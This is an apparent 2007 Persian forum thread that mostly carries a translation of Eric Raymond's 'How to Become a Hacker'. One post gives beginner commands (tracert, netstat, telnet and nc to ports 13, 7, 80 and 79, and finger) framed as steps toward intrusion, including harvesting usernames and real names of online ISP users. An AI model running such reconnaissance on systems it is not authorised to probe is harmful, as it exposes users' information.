امیدوارم از این آموزش خوشتو آمده باشه اگه خدا بخواد حرفه ایشم می گذارم اگه بد بود ببخشید دیگه بهتر از این نتونستم بگم امیدوارم به کارتون خورده باشه شاد و پیروز باشید

mazi_z_PSP
12-05-2007, 20:11
اگر فونت این مطالب براتون کوچيک هستش و نميتونين به راحتی بخونين ميتونين تو Word کپی کنين و فونت رو طبق نظر خودتون درست کنين

Payman_62
13-05-2007, 00:57
سلام.
مطالبت خیلی قدیمیه. ولی خوب برای مقدمه خوبه. امیدوارم در جا نزنی و مطالبت به روز باشه.
سعی کن مطالب ارسالی ارتباط با برنامه نویسی ویبی داشته باشه. صرفا آموزش هک در این انجمن جایی نداره.

COMING-UP-NEXT
13-05-2007, 01:34
حالا 1 سوال ؟

هکر کیست و چیست و اینا بماند ...

اما اکثر اکسپلویت ها به زبان های Perl و C هستن چرا VB ؟

در ضمن اینا به vb ربطی نداشت که ؟

چرا همه فکر می کنن که برای هکر شدن نیاز دارن که از vb شروع کنن ؟

mazi_z_PSP
14-05-2007, 13:46
سلام.
مطالبت خیلی قدیمیه. ولی خوب برای مقدمه خوبه. امیدوارم در جا نزنی و مطالبت به روز باشه.
سعی کن مطالب ارسالی ارتباط با برنامه نویسی ویبی داشته باشه. صرفا آموزش هک در این انجمن جایی نداره.
ممکنه مطالب قديمی باشه اما برايه کسايی که ميخوان از اول يا از وسط شروع کنن الزامی هستش

mazi_z_PSP
14-05-2007, 13:48
حالا 1 سوال ؟

هکر کیست و چیست و اینا بماند ...

اما اکثر اکسپلویت ها به زبان های Perl و C هستن چرا VB ؟

در ضمن اینا به vb ربطی نداشت که ؟

چرا همه فکر می کنن که برای هکر شدن نیاز دارن که از vb شروع کنن ؟
نه عزيز من هم با حرفت کاملا موافقم.حتماً که نبايد وی بی باشه.در مقاله ها هم اشاره شده که ميتونه وی بی هم باشه.حالا اگر از زبان ديگه ای استفاده ميکنی برايه خودتی.فعلا مقاله ها به اونجايی نرسيده که زبان ها تقسيم بشن.فعلا عمومی هستش.تا بعد که کمی پيشرفته بشه.سعی ميکنم بيشتر راجب وی بی باشه

mazi_z_PSP
14-05-2007, 13:51
سلام دستور Tracert اين دستور ميگه که از چند تا کامپيوتر بگذريم تا به lover-hackers.comبرسيم دستور رو در CMdبه اين شکل اجرا کنين tracert your domainکه به جای your doaminآدرس سايتو بنويسيد. پورتهای باز کامپيوتر خودمان را ببينيم خوب شما الان چون با مفهوم پورت آشنا هستيد و ميدونيد در هک اساسی ترسن کارها رو پورت انجام ميشه و حتی با ميتوان با باز بودن پورت يک کامپيوتر بهش نفوذ کرد اين خيلی مهمه که پورتهای باز خودتونو ببينيد.از يکی از اين دو دستور استفاده ميکنيم . ۱-درCMDويندوزتان تايپ کنيدnetstat -anکه اين دستور پورتها رو به صورت عدد نشون ميده به خاطر اون numberآخرش ۲-دستور netstat -aمعادل اسمس آن پورت را نمايش ميدهد من قسمتيش واستون ميگم در خط اولش نوشته Protoکه معادل آن است که پروتکل شما TCP or UPDاست بعد ميريم سراغLocal Adress که اونجا هم IPرو نوشته وپورتها رو البته ماله خودتون است و در آخر Stateوضعيت اتصال رو نمايش ميده حالا با استفاده از اينا چيکار کنيم؟خوب ميتونيم ببينيم Trojanروش فعال است يا نه؟ يه توضيح کوچک در مورد تروجان بدم که اسبهای تروجان ويروسهايی هستن که پورت خاصی رو کامپيوتر طرف باز نگه ميدارن و شما به اون کامپيوتر نفوذ ميکنيد که معروفترین اونا ساب سون هست. به دست آوردن اسم کامپيوتر يک کلاينت: اول يه تعريف کوچولو برای کلاينت:به کامپيوترهايی که با Dial upوصل هستند يا در تعريف خودمانی همون کامپيوترهای خودمنو ميگيم .خوب برای به دست آوردن اسم کامپيوتر طرف بايد باهاش چت کنين اما برای مطمعن شدن بايد بگی طرف Voiceبده. اگه داد اين عبارتو تايپ کنيدnetstat اما مهمترين چيز اين است که به دنبال شماره ۵۱۰۱بگردين چون اين کمک به حال گيری ميکنه. معرفی پورتها و صحبت کردن با آنها مراحل آخر هک : خوب بايد ياد بگيريم با پورتها صحبت کنيم اين مطلب راحته و همش از يه دستور استفاده ميشه صحبت با پورت ۱۳ ۱-پورت ۱۳ که پورت Daytimeناميده ميشه خيلی ساده لوحه و هميشه راست ميگه البته هميشه اين پورتو ميبندن يا به قول معروف خفش ميکنن برای صحبت کردن با آن اين دستور را اجرا کنيد telnet ip adress 13يا nc -v ip adress 13 خوب به چه درد ميخوره؟ميتونيم تشخيص بديم کامپيوتر در ايران است يا نه با توجه به تاريخ و ساعتش مفهومه که؟ صحبت با پورت ۷ اين پورت کاره خاصی نميکنه فقط هر چی بهش بدين براتون همونو پس ميفرسته چه مسخره!!! بعد اينم دستورشtelnet your ip adress 7يا nc -v ip 13و به جای همه ی دستورات بالا به جای ip ياypur ip adressشماipسايتتونو بنويسيد صحبت با پورت ۸۰ اين پورت کارش اينه که برای جستجوی صفحات اينترنتی ميره اولين دستور ميگه هر چی headerهست رو نشون بدهGET /[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]نتايج من ديگه نشون ندادم خودتون امتحان کنيد. جالبه!!! دومين دستور ميگه که هر چی هست يعنی در اينجا whatکار ميبريم نشون بده GET /what/everولی شما رای اين کار مسيرو بديد کجاهارو ميخوان مثلاexe صحبت با پورت ۷۹ مهمه خوب اين پورت Endeحاله يعنی اينکه شما ميتونين با استفاده از اين دستور بفهمين چند نفر از کاربران ISPشما onهستن و همچنين شايد خوش شانس باشيد و ISPدر پيتس باشه USER NAMEهم ميده و مثلا اسم يه کامپيوتر alborzاست خوب اينم ۳ تا دستور برای گرفتن اطلاعات telnet alborz.com79 nc -v alborz.com79 finger @alborz.com79 اين پورت بستگی به سرور داره ممکنه usernameهم نشون بده و حتی نام نام خانوادگی افراد آنلاين پس همين الان دسته به کار شويد و به serverهای مختلف telnetکنين و اين usernameهام که گفتم به چه دردی ميخوره به درده دود کردن اينترنت ميخوره صحبت با پورت ۱۱۰ اين پورت برای خواندن ايمیل به کار ميره مثلا من در نو آور ايميل دارم پس ميخوام ايميلهامو چک کنم تايپ ميکنمtelnet mail.noavar.com 110ياnc -v mail.noavar.com 110 بعدش وارد يه محيط مثل ftpميشين بعد از شما userوpassميخوادکه شما بدين خوب الان در درون ايميل هايتان غلط ميزنيد و اين دستورهای مهم را هم اجرا کنيد اين دستور حجم کليه ايميلهای رسيده را ميگهstat اين دستور ليست پيام ها رو ميگه list در اين دستور متن نامه رو ميخوانيم البته بگم شماره ی مورد نظرتونو برای خواندنش وارد کنيدretr پاک کردن ايميل dele 54 برای خارج شدنquit امیدوارم از این آموزش خوشتو آمده باشه اگه خدا بخواد حرفه ایشم می گذارم اگه بد بود ببخشید دیگه بهتر از این نتونستم بگم امیدوارم به کارتون خورده باشه شاد و پیروز باشید

mazi_z_PSP
14-05-2007, 14:13
سلام .با اجازه دوستان و مديران محترم من يک سری مقالات دارم درباره هک که عمومی هستش و به طور کامل هکر شدن رو ياد ميده.اما نه با يک زبان خاص.انتخاب زبان رو به عهده خودتون ميزاره.این مطالب رو به صورت درس به درس ميزارم تا بقيه استفاده کنن.از الان بگم ممکنه زياد ربطی به وی بی نداشته باشه اما خيلی مفيد هستش.اگر این مطالب رو تا آخر به خونين ميتونين ازشون در وی بی هم استفاده کنين

mazi_z_PSP
14-05-2007, 14:15
نويسنده: Eric Steven Raymond (esr@thyrsus.com) مترجم: ميثم فرضعلی‌پور (meisam460@hotmail.com?subject=HTBH)


يک هکر کيست؟
فايل اصطلاحات هکرها ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]) شامل تعدادی از تعاريف برای واژه‌ی هکر است. اکثراً شامل انجام کارها با مهارت فنی و اشتياق در حل مسائل و غلبه بر محدوديت‌ها. ولی اگر شما می‌خواهید بدانید که چگونه یک هکر شوید، تنها دوتای آن‌ها به دردتان می‌خورد.
جامعه‌ای با يک فرهنگ اشتراکی متشکل از برنامه‌نويسان خبره وجود دارد که پیشینه‌ی آن به دهه‌های قبل و زمان اولين کامپيوتر کوچک و آزمايش‌های اوليه‌ی آرپانت بازمی‌گردد.
اعضای اين جامعه اصطلاح هکر را به وجود آوردند. هکرها اينترنت را ساختند. هکرها سيستم‌عامل يونيکس را تبديل به سيستم‌عاملی کردند که اکنون می‌بينيد. هکرها يوزنت را اداره می‌کنند. هکرها وب را به وجود آوردند. اگر شما بخشی از اين فرهنگ هستيد، اگر شما در آن همکاری کرده‌ايد و اگر افراد ديگر اين جامعه شما را يک هکر می‌دانند، پس شما يک هکر هستيد.
نگرش هکرها محدود به فرهنگ هکرهای کامپيوتر نيست. افرادی وجود دارند که منش هکرها را در موضوعات ديگر مانند الکترونيک يا موسيقی نيز بکار می‌برند.
درواقع شما می‌توانيد آن را در بالاترين سطح از هر شاخه‌ی علم يا هنر بيابيد.
هکرهای کامپيوتر اين روح اصلی را در موضوعات ديگر نيز به رسميت می‌شناسند و می‌توان به آنها نيز هکر گفت.
- و برخی معتقدند ماهيت اصلی هکر بودن مستقل از واسطه‌های خاصی است که هکرها با آنها کار می‌کنند. اما بقيه‌ی اين متن به مهارت‌ها و منش‌های هکرهای کامپيوتر و عقايد رايج در مورد فرهنگ اشتراکی که سرچشمه‌ی واژه‌ی هکر است، خواهدپرداخت.
گروه ديگری از مردم وجود دارند که با سروصدای زيادی خودشان را هکر می‌نامند. اما آنها هکر نيستند. آنها (اکثراً پسرهای نوجوان) افرادی هستند که به صورت غير مجاز به کامپيوترها دسترسی پبدا می‌کنند يا از سيستم‌های تلفن سوء استفاده می‌کنند.
هکرهای واقعی اين افراد را کرکر(Cracker) می‌نامند و کاری به آنها ندارند. اکثر هکرهای واقعی معتقدند که کرکرها تنبل و بی‌مسئولیت بوده و چندان هم باهوش نيستند. اشيايی که می‌توانند سيستم‌های امنيتی را از کار بياندازند، شما را هکر نمی‌کنند، همانطور که «روشن کردن اتوموبيل با تکه‌ای سيم شما را مهندس مکانيک نمی‌کند»، .
متاسفانه اکثر روزنامه‌نويسان و نويسندگان به اشتباه واژه‌ی هکر برای معرفی کرکرها به‌کار می‌برند و اين کار هکرها را بسيار عصبانی می‌کند.
تفاوت اساسی اين است: هکرها چيزهايی می‌سازند، کرکرها آنها را خراب می‌کنند.
اگر شما می‌خواهيد هکر شويد، به خواندن ادامه دهيد. اما اگر می‌خواهيد کرکر شويد، گروه خبری alt.2600 (news:alt.2600) را بخوانيد و آماده باشيد که به زودی در زندان کارمجانی انجام دهيد. آن‌وقت متوجه خواهيد شد که آنقدرها که فکر می‌کرديد، باهوش نبوديد. و این تمام چيزی است که من به شما در مورد کرکرها می‌گويم.

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

mazi_z_PSP
14-05-2007, 14:16
نويسنده: Eric Steven Raymond (esr@thyrsus.com) مترجم: ميثم فرضعلی‌پور (meisam460@hotmail.com?subject=HTBH)

مرامنامه‌ی هکری

هکرها مشکلات را حل می‌کنند و سازنده عمل می‌کنند. آنها به آزادی و کمک داوطلبانه‌ی دوجانبه اعتقاد دارند. برای پذيرفته شدن به عنوان يک هکر، شما بايد به نحوی رفتار کنيد مانند آنکه خودتان اين نوع نگرش را داريد و برای اینکه اینگونه رفتار کنید شما باید واقعاً به آن اعتقاد داشته باشيد .
اما اگر شما فکر می‌کنيد که نگرش اجتماعی هکرها فقط راهی برای پذيرفته شدن در اين فرهنگ است، شما اصل موضوع را فراموش خواهيد کرد. تبديل شدن به فردی که به اين موضوعات اعتقاد دارد، برای کمک به يادگيری و با انگيزه نگاه‌داشتن شما مهم است. مانند همه‌ی هنرهای سازنده، بهترين راه برای استاد شدن پيروی کردن از خط فکری استاد است. نه فقط به صورت فکری بلکه همچنين به صورت حسی. يا مانند آنچه اين شعر مدرن Zen می‌گويد:
تا که راه یابی:
به استاد بنگر
به دنبالش باش
با او برو
از نگاه او بنگر
استاد شو پس اگر شما می‌خواهيد يک هکر بشويد، جملات زير را تکرار کنيد تا به آنها اعتقاد پيدا کنيد.

mazi_z_PSP
14-05-2007, 14:17
۱-جهان مملو از مسائل جذاب است که در انتظار حل شدن به سر می‌برند
هکر بودن بسيار هیجان‌انگیز است. اما اين نوع هیجان به تلاش زيادی نياز دارد و تلاش محتاج انگيزه است.ورزشکاران موفق انگيزه‌ی خودشان را از لذتی که در غلبه‌ی آنها بر محدوديت‌های فیزیکی بدنشان در آنها به وجود می‌آيد، بدست می‌آورند. به‌طور مشابه برای هکر بودن شما بايد انگيزه‌ی اوليه را از حل مشکلات و افزايش مهارت‌ها و تمرين هوش خود بدست آوريد.اگر شما جزو افرادی نيستيد که ذاتاً اينگونه فکر می‌کنند، برای هکر شدن بايد چنين شويد.
در غيراينصورت شما خواهيد ديد که انرژی هکری شما به وسيله‌ی عواملی مانند سکس و پول و مشهورشدن تضعيف می‌شود (همچنين شما بايد ايمان به ظرفيت يادگيری خودتان را بيشتر کنيد -باور داشته باشيد که حتی اگر تمام چيزهايی که برای حل مسئله لازم است را ندانيد، اگر فقط از عهده‌ی قسمت کوچکی از آن برآييد و آن را ياد بگيريد، به اندازه‌ای که برای حل مسئله لازم است ياد خواهيد گرفت- و به همين شيوه ادامه دهيد تا مسئله حل شود)

mazi_z_PSP
14-05-2007, 14:17
۲-هيچ مسئله‌ای نبايد دو بار حل شود
ذهن‌های سازنده، منابع باارزش و محدودی هستند. آنها نبايد برای دوباره اختراع کردن چرخ تلف بشوند در حالی که مسائل جذاب بسيار زيادی وجود دارد.
برای رفتار کردن مانند يک هکر، شما بايد اعتقاد داشته باشيد که زمان فکر کردن هکرهای ديگر بسيار پرارزش است. بنابراين به اشتراک گذاشتن اطلاعات تقريباً يک کار اخلاقی است. مسائل را حل کنيد و سپس راه‌حل را منتشر کنيد تا هکرهای ديگر بتوانند به عوض دوباره حل کردن مسائل حل شده، مسائل جديد را حل کنند. (لازم نيست معتقد باشيد که بايد همه‌ی یافته‌های خودتان را منتشر کنيد. گرچه هکرهايی که اين کار را انجام می‌دهند بيشترين احترام را در ميان هکرهای ديگر دارند. اين با معيارهای هکرها سازگار است که به اندازه‌ی کافی از آنها بفروشيد تا بتوانيد ضروريات خود و نيازهای کامپیوترتان را تامين کنيد. خوب است که از مهارت‌های هکری خودتان برای تامين خانواده يا حتی ثروتمند شدن استفاده کنيد. مادامی که وظيفه‌ی خودتان را به هنرتان و هکرهای ديگر فراموش نکنيد)

mazi_z_PSP
14-05-2007, 14:18
خب دوستان این تنها قسمت کوچکی از این مقاله بود.منتظر ادامه مطالب باشيد

mazi_z_PSP
14-05-2007, 14:19
۳-کسالت و بیگاری مضر هستند
هکرها (و به طور کلی افراد خلاق) هيچ وقت نبايد کسل بشوند يا کارهای سخت و تکراری انجام بدهند. زيرا در اينگونه موارد آنها به کاری که می‌توانند انجام دهند (حل مسائل جديد) نمی‌پردازند و اين بی‌فايده بودن هر کسی را می‌رنجاند. بنابراين خستگی و مشقت نه‌فقط ناخوشايند بلکه واقعاً مضر هستند.
برای رفتار کردن مانند يک هکر، شما بايد کاملاً ايمان داشته باشيد که می‌خواهيد ناخودآگاه از چيزهای کسل کننده تا آنجا که ممکن است دور شويد.نه فقط به خاطر خودتان بلکه برای هر کس ديگر (مخصوصاً هکرها). (يک استثنای بارز در اينجا وجود دارد. هکرها ممکن است بعضی اوقات کارهايی را انجام بدهندکه برای يک ناظر تکراری يا خسته کننده به نظر بيايد. به عنوان تمرين ذهنی يا به منظور به دست آوردن يک مهارت يا انجام دادن تمرينات مخصوص، شما به طرز ديگری نمی‌توانيد عمل کنيد. اما شما در اين انتخاب آزادی داريد.- هيچ فرد اندیشمندی، نبايد به اجبار در وضعيتی قرار گيرد که او را کسل کند.)

mazi_z_PSP
14-05-2007, 14:20
۴-آزادی خوب است
هکرها به طور طبيعی مخالف استبداد هستند. هر کسی که بتواند به شما دستور بدهد، می‌تواند شما را از حل کردن مسائلی که مجذوبشان شده‌ايد باز دارد. و مسلماً به طوری که ذهن‌های مستبد کار می‌کند، معمولاً دليل‌های احمقانه و وحشتناکی برای چنين کاری پيدا می‌کنند. پس با روش استبدادی هر کجا که آن را يافتيد بايد مبارزه کنيد وگرنه شما و ديگر هکرها را خفه می‌کند.
(اين به معنای جنگ با تمام قدرت‌ها نيست -کودکان بايد راهنمایی(تادیب) شوند، خلافکاران بايد محدود بشوند. يک هکر ممکن است موافق باشد که نوعی از قدرت را به منظور به دست آوردن چيزی که او می‌خواهد، بپذيرد. اما اين يک معامله‌ی آگاهانه و محدود است. آنجايی که فردی تسليم خواسته‌های ديکتاتور می‌شود، يک پيشنهاد نيست.) ديکتاتورها در سانسور و پنهان‌کاری موفق هستند. آنها برای همکاری‌های داوطلبانه و به اشتراک گذاشتن اطلاعات مزاحمت ايجاد می‌کنند. آنها فقط مشارکت در کارهايی را می‌پسندند که خودشان آن را کنترل کنند. پس برای رفتار کردن مانند يک هکر، شما بايد يک دشمنی ذاتی با سانسور، پنهان‌کاری، فريب‌دادن و استفاده از زور برای تحت فشار قرار دادن افراد مسئول را در خود پرورش دهيد و بر طبق این عادت عمل کنید.

mazi_z_PSP
14-05-2007, 14:20
۵-نگرش جايگزينی برای مهارت نيست
برای هکر شدن شما بايستی تعدادی از اين نگرش‌ها را در ذهنتان توسعه بدهيد. اما کپی برداری محض از عقايد به تنهايی شما را هکر نمی‌سازد همانگونه که شما را قهرمان ورزشی يا ستاره‌ی راک نمی‌کند. هکر شدن به هوش، تمرين، از خود گذشتگی و سخت‌کوشی نياز دارد.
بنابراين شما بايد ياد بگيريد که به منش اتکا نکنيد و به هر نوع توانايی احترام بگذاريد. هکرها اجازه نمی‌دهند که ژست‌ها وقت آنها را تلف کنند. اما آنها احترام زيادی برای توانايی قائل‌اند. مخصوصاً توانايی در زمينه‌ی هکری. اما توانايی در هر کاری خوب است. توانايی در بدست آوردن مهارت‌هايی که افراد کمی می‌توانند در آن زمينه به درجه‌ی استادی برسند، خيلی خوب است و توانايی در مهارت‌هايی که مستلزم زکاوت، مهارت و تمرکز هستند بهترين است. اگر شما به توانايی احترام بگذاريد، از توسعه‌ی توانايی‌های خود لذت خواهيد برد و سخت‌کوشی و فداکاری بيشتر از مشقت به کاری مشتاقانه بدل خواهد شد. اين طرز فکر برای هکر شدن حياتی است.

mazi_z_PSP
20-05-2007, 12:15
با تشکر از دوستانی که نظر دادن. اینم ادامه مقالات

mazi_z_PSP
20-05-2007, 12:17
نويسنده: Eric Steven Raymond (esr@thyrsus.com)
مترجم: ميثم فرضعلی‌پور (meisam460@hotmail.com?subject=HTBH)

مهارت‌های بنيادی هکرها


داشتن منش هکرها برای هکر شدن حياتی است اما مهارت‌ها اهميت بيشتری دارند. منش جايگزينی برای مهارت نيست. مجموعه‌ای از مهارت‌های پايه وجود دارند که شما بايستی برای هکر شدن داشته باشيد. اين مهارت‌ها با گذشت زمان، هنگامی که تکنولوژی مهارت‌های جديدی را می‌سازد و مهارت‌های قديمی را منسوخ می‌کند، به آرامی تغيير می‌کنند. در گذشته برنامه‌نويسی به زبان ماشين شامل این مجموعه بود و تا اين اواخر زبان HTML جزو این مهارت‌ها نبود. اما اکنون به‌وضوح شامل موارد زیر است:
۱-چگونه برنامه نوشتن را ياد بگيريد
البته اين يک مهارت پايه‌ای برای هکرهاست. اگر شما هيچ کدام از زبانهای برنامه‌نويسی را بلد نيستيد، من به عنوان شروع پايتون را به شما پيشنهاد می‌کنم. پايتون با ظرافت طراحی شده و به خوبی مستند سازی شده است و نسبتاً ابتدایی است.
با وجود اينکه پايتون به عنوان اولين زبان برنامه‌نويسی برای یادگيری خوب است ولی تنها يک اسباب بازی نيست. پايتون خيلی قدرتمند و انعطاف پذير بوده و برای پروژه‌های بزرگ مناسب است. من يک ارزيابی از پايتون ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]) را با جزئيات کامل نوشته‌ام. منابع آموزشی ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]) خوبی در سايت پايتون ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]) در دسترس هستند.
جاوا نيز زبان خوبی برای آموزش برنامه‌نويسی است. جاوا از پايتون مشکل‌تر است ولی کدهای سريعتری توليد می‌کند. فکر می‌کنم به عنوان زبان دوم برنامه‌نويسی خیلی خوب باشد.
متاسفانه منابع پياده‌سازی شرکت Sun هنوز اختصاصی هستند. به علت وجود يک مفسر منبع‌باز خوب برای جاوا اين امر چندان بحث زيادی به وجود نمی‌آورد. مشکل واقعی توابع کتابخانه‌ای هستند که با زبان منتقل می‌شوند. توابع کتابخانه‌ای منبع‌باز نسبت به توابع Sun ضعيف‌تر هستند. بنابراين اگر شما تصميم داريد که جاوا را ياد بگيريد، به عوض وابستگی به کد اختصاصی Sun با يک پياده‌سازی منبع‌باز کار کنيد.
اما توجه کنيد که اگر تنها يک يا دو زبان برنامه‌نويسی را بلد باشيد، به مهارت‌های يک هکر دست پيدا نخواهيد کرد يا حتی صرفاً يک برنامه‌نويس هم نخواهيد شد. شما بايد بياموزيد که به‌طور کلی چگونه در مورد مسائل برنامه‌نويسی مستقل از هر زبانی فکر کنيد. برای اينکه يک هکر واقعی شويد، شما بايد به سطحی برسيد که بتوانيد با ارتباط دادن موضوعات موجود در راهنما به دانسته‌های خود، در طی چند روز يک زبان را ياد بگيريد. بنابراین شما بايستی چندين زبان کاملاً متفاوت را ياد بگيريد.
اگر شما به‌طور جدی به برنامه‌نويسی بپردازيد، مجبوريد که زبان C که زبان هسته‌ی يونيکس است را ياد بگيريد. زبان ++C خيلی شبيه C است. اگر شما يکی از آنها را بدانيد، ياد گيری ديگری چندان مشکل نخواهد بود. با وجود اين هيچ کدام از آنها به‌عنوان اولين زبان برنامه‌نويسی برای يادگيری خوب نيستند. درواقع هرچه بيشتر از برنامه‌نويسی با زبان C اجتناب کنبد، بازدهی بیشتری خواهيد داشت.
زبان C بسيار کارآمد است و در استفاده از منابع سيستم بسيار صرفه‌جويی می‌کند. متاسفانه زبان C کارآیی خودش را با نياز به کدنويسی سطح پايين برای مديريت منابع سيستم (مانند حافظه) بدست می‌آورد. همه‌ی کدهای سطح پايين پيچيده و مستعد باگ هستند و وقت زيادی را در مرحله‌ی اشکال زدايی به خود اختصاص می‌دهند. با کامپيوترهای امروزی و قدرتی که آنها دارند، اين معمولاً معامله‌ی خوبی نيست. بهتر است از زبانهايی استفاده کنيم که کمی وقت کامپيوتر را تلف کنند ولی از زمان شما بسيار مفيدتر استفاده کنند. مانند پايتون .
زبانهای برنامه‌نويسی ديگری که اهميت ويژه‌ای برای هکرها دارندشامل Perl ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]) و LISP ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]) می‌شوند. Perl به دلیل کاربردی بودن ارزش يادگيری دارد. Perl به طور گسترده‌ای در صفحات وب فعال و مديريت سيستم‌ها استفاده می‌شود. بنابراين حتی اگر شما برنامه‌ای به زبان Perl ننويسيد، بايد بتوانيد برنامه‌هايی را که به زبان Perl نوشته شده‌اند را بخوانيد. اکثر افراد از Perl در جایی استفاده می‌کنند که من به شما پایتون را توصیه کردم (خودداری از برنامه‌نويسی به زبان C در کارهايی که به امکانات C نيازی ندارد). شما نياز پيدا خواهيد کرد که کدهای نوشته شده توسط آنها را بخوانيد.
LISP به دليل ديگری ارزش يادگيری دارد. LISP به روشن‌فکری عميقی نياز دارد که پس از یادگیری آن را به دست خواهید آورد.اين تجربه شما را برنامه نويس بهتری خواهد کرد. حتی اگر چندان برنامه‌ای با LISP ننويسيد. (شما به راحتی می‌توانيد با نوشتن و تغيیر دادن محيط ويرايش Emacs تجربه‌ی مقدماتی با LISP را بدست آوريد)
بهترين روش يادگيری همه‌ی زبانهای گفته شده (پايتون، جاوا، ++C/C، پرل و LISP) است. اين زبانها علاوه بر اينکه مهم‌ترين زبانهای برنامه‌نويسی در دنيای هک هستند، نمايانگر خط مشی‌های متفاوت در برنامه‌نويسی نيز می‌باشند و هرکدام معلومات باارزشی به شما می‌دهند.
من نمی‌توانم در اينجا دستورالعمل کاملی در مورد اينکه چگونه برنامه بنويسيد ارائه دهم. کتابها و دوره‌های آموزشی نيز چنين کاری نمی‌کنند. (بيشتر و شايد همه‌ی هکرها خودشان مهارت‌هايشان را ياد گرفته‌اند) برنامه‌نويسی يک مهارت پيچيده است. شما می‌توانيد امکانات يک زبان برنامه‌نويسی -قسمتی از دانش مورد نياز برای برنامه‌نويسی- را از کتابها ياد بگيريد. اما طرز فکری که اينگونه اطلاعات را به مهارت‌های کاربردی تبديل می‌کند، تنها به وسيله‌ی تمرين و کارآموزی بدست می‌آيد و اين يعنی ۱)خواندن کد و ۲)نوشتن کد.
يادگرفتن برنامه‌نويسی مانند يادگيری خوب نوشتن يک زبان طبيعی است. بهترين روش برای اين کار خواندن برنامه‌هايی است که به وسيله‌ی استادان نوشته شده است. پس از آن سعی کنيد خودتان برنامه‌هايی بنويسيد و دوباره خيلی بيشتر بخوانيد، کمی بيشتر بنويسيد، خيلی بيشتر بخوانيد... اين چرخه را ادامه دهيد تا زمانی که برنامه‌های شما قدرت و کارايی برنامه‌های نوشته شده نوسط استادان را بدست آورند. سابقاً يافتن سورس‌کدهای خوب کار سختی بود. به دليل اينکه تعداد کمی کد منبع از برنامه‌های بزرگ برای خواندن و تغيير دادن در اختيار هکرهای تازه‌کار بود. اما اکنون اين وضعيت به طرز چشمگیری تغيير کرده است. نرم‌افزارهای منبع‌باز، ابزارهای برنامه‌نويسی و سيستم‌های عامل (که همه‌ی ّنها به وسيله‌ی هکرها تهيه شده‌اند) اکنون به سادگی در دسترس هستند. که مرا به نوشتن مبحث بعدی ترغیب می‌کند.

mazi_z_PSP
20-05-2007, 12:18
۲-يکی از يونيکس های منبع‌باز را بدست بياوريد و ياد بگيريد که چگونه آن را بکار ببريد
من فرض می‌کنم که شما صاحب يک کامپيوتر شخصی هستيد يا به يک کامپيوتر شخصی دسترسی داريد. همه‌ی کودکان امروزه يک کامپيوتر دارند. مهم‌ترين قدمی که هر مبتدی در جهت بدست آوردن مهارت های هک می‌تواند بردارد، تهيه‌ی يک نسخه از Linux يا BSD Unix، نصب کردن آن بر روی کامپيوتر خود و به کار بردن آن است.
درست است که سيستم‌عامل‌های ديگری نيز به جز يونيکس وجود دارند اما آنها در قالب دودويی منتشر می‌شوند و شما نمی‌توانيد سورس کد آنها را بخوانيد يا تغيير دهيد. سعی برای يادگيری هک بر روی سيستم‌های دارای ويندوز، MacOS و يا هر سيستم منبع بسته‌ی ديگر مانند تلاش برای یادگیری رقص در لباش شوالیه است .
تحت OS/X اين مسئله امکان پذير است اما فقط بخشی از این سيستم منبع باز است و به احتمال زياد شما را به بن‌بست خواهد کشاند و بايد مواظب باشيد که به کد اختصاصی اپل عادت نکنيد. اگر شما بر روی يونيکس تمرکز کنيد، با چشمان بسته نيز چيزهای مفيدی ياد می‌گيريد.
يونيکس سيستم عامل اينترنت است. شما می‌توانيد بدون دانستن يونيکس از اينترنت استفاده کنيد. اما بدون داشتن درک درستی از يونيکس هرگز هکر اينترنتی خوبی نخواهيد شد. به همين دليل امروزه جامعه‌ی هکرها شديداً يونيکس محور است. (اين موضوع همواره صادق نبوده و برخی از هکرهای قديمی از اين موضوع راضی نيستند.اما همزيستی بين يونيکس و اينترنت به قدری محکم است که حتی قدرت مايکروسافت هم نمی‌تواند جلوی آن را بگيرد.)
پس يک يونيکس را انتخاب کنيد. من خودم لينوکس را دوست دارم اما انتخاب‌های ديگری نیز وجود دارند. (شما می‌توانيد همزمان لينوکس و ويندوز را بر روی سيستم خود اجرا کنيد) آن را ياد بگيريد، بکار ببريد و تغيير دهيد. به وسيله‌ی آن از اينترنت استفاده کنيد. سورس کد آن را بخوانيد و تغيير دهيد. شما ابزارهای برنامه‌نويسی بهتری به دست خواهيد آورد. که هر سيستم ويندوز در رويای به‌دست آوردن آنهاست. (شامل C، LISP، Python و Perl) و اين شما را سرگرم خواهد کرد. و شما بدون آنکه متوجه شويد معلومات زيادی کسب خواهيد کرد و هنگامی که مانند يک استاد به مسائل نگاه کنيد به اين موضوع پی‌می‌بريد.
برای بدست آوردن اطلاعات بيشتر در مورد يادگيری يونيکس Loginataka ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]) را ببينيد. شما ممکن است مايل باشيد که نگاهی نيز به «هنر برنامه‌نويسی در يونيکس» ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]) بياندازبد
برای بدست آوردن اطلاعات بيشتری در مورد لينوکس، سايت «لينوکس آنلاين» ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]) را ببينيد. شما می‌توانيد از آنجا لينوکس را داونلود کنيد يا (يک ايده‌ی بهتر) يک گروه محلی از کاربران لينوکس را بيابيد که به شما در نصب لينوکس کمک کنند. از ديدگاه يک کاربر جديد لينوکس، همه‌ی توزيع‌های لينوکس بسيار به هم شبيه هستند.
شما می‌توانيد منابع کمکی يونيکس برکلی را در [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]) بيابيد.
